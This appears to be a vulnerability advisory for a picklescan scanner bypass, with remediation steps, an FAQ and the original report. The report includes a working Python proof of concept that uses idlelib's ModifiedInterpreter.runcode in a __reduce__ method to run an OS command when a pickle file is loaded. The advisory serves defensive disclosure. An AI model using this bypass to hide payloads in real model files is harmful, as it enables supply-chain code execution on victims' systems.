GHSA-3gf5-cxq9-w223: picklescan: scanner bypass enables pickle RCE in ML models
GHSA-3gf5-cxq9-w223 MEDIUMIf your team uses picklescan to gate ML model loading (PyTorch, etc.), that control is bypassed by this exploit — attackers can embed RCE payloads in pickle files that pass scanning. Patch picklescan to 0.0.30 immediately and audit any models loaded from untrusted sources since the library was deployed. Until patched, do not treat picklescan clearance as sufficient to load models from external or community sources.
Risk Assessment
Practical risk is HIGH despite medium CVSS. This vulnerability defeats a security control specifically implemented to prevent pickle-based RCE — the exact threat it was designed to block. With a public PoC, exploitation is trivial. The blast radius is any pipeline that treats a picklescan pass as authorization to load a model file, which is likely the common deployment pattern. Supply chain attack potential is significant: a single poisoned model on HuggingFace Hub or similar registry could compromise many downstream environments.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.30 | 0.0.30 |
Do you use picklescan? You're affected.
Severity & Risk
Recommended Action
5 steps-
PATCH
Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass).
-
AUDIT
Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised.
-
DEFENSE-IN-DEPTH: Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources.
-
DETECT
Monitor for unexpected child processes spawned during model load operations (e.g., os.system calls from Python interpreter).
-
PREFER SAFE FORMATS
Where possible, prefer safetensors over pickle-based formats for model distribution.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-3gf5-cxq9-w223?
If your team uses picklescan to gate ML model loading (PyTorch, etc.), that control is bypassed by this exploit — attackers can embed RCE payloads in pickle files that pass scanning. Patch picklescan to 0.0.30 immediately and audit any models loaded from untrusted sources since the library was deployed. Until patched, do not treat picklescan clearance as sufficient to load models from external or community sources.
Is GHSA-3gf5-cxq9-w223 actively exploited?
No confirmed active exploitation of GHSA-3gf5-cxq9-w223 has been reported, but organizations should still patch proactively.
How to fix GHSA-3gf5-cxq9-w223?
1. PATCH: Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass). 2. AUDIT: Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised. 3. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources. 4. DETECT: Monitor for unexpected child processes spawned during model load operations (e.g., os.system calls from Python interpreter). 5. PREFER SAFE FORMATS: Where possible, prefer safetensors over pickle-based formats for model distribution.
What systems are affected by GHSA-3gf5-cxq9-w223?
This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, MLOps CI/CD pipelines, agent frameworks loading external tools/models.
What is the CVSS score for GHSA-3gf5-cxq9-w223?
No CVSS score has been assigned yet.
Technical Details
NVD Description
### Summary Using idlelib.pyshell.ModifiedInterpreter.runcode function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcode function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.pyshell import ModifiedInterpreter from types import SimpleNamespace class EvilIdlelibPyshellModifiedInterpreterRuncode: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace( locals={}, tkconsole=SimpleNamespace( executing=False, beginexecuting=str, canceled=False, closing=False, showtraceback=str, endexecuting=str, stderr=None, text=SimpleNamespace(), getvar=str ), rpcclt=None, debugger=None, checklinecache=str, active_seq=None, showtraceback=str, canceled=False, closing=False ) return ModifiedInterpreter.runcode, (fake_self, payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu
Exploitation Scenario
An adversary uploads a PyTorch model (.pt file) to a public model hub or sends it via a supply chain vector. The file embeds a `__reduce__` method using `idlelib.pyshell.ModifiedInterpreter.runcode` — not in picklescan's blocklist — to execute an OS command. A target organization's automated MLOps pipeline downloads the model, runs picklescan for validation (result: CLEAN), then calls `torch.load()` or `pickle.load()`. On load, the payload executes: reverse shell, credential theft, or lateral movement. Because the compromise happens inside the Python process at model-load time, it inherits all permissions of the ML worker — often a privileged service account with access to training data, secrets, and inference infrastructure.
References
Timeline
Related Vulnerabilities
GHSA-vvpj-8cmc-gx39 10.0 picklescan: security flaw enables exploitation
Same package: picklescan GHSA-g38g-8gr9-h9xp 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan GHSA-7wx9-6375-f5wh 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan CVE-2025-1945 9.8 picklescan: ZIP flag bypass enables RCE in PyTorch models
Same package: picklescan GHSA-hgrh-qx5j-jfwx 8.8 picklescan: Protection Bypass circumvents security controls
Same package: picklescan
AI Threat Alert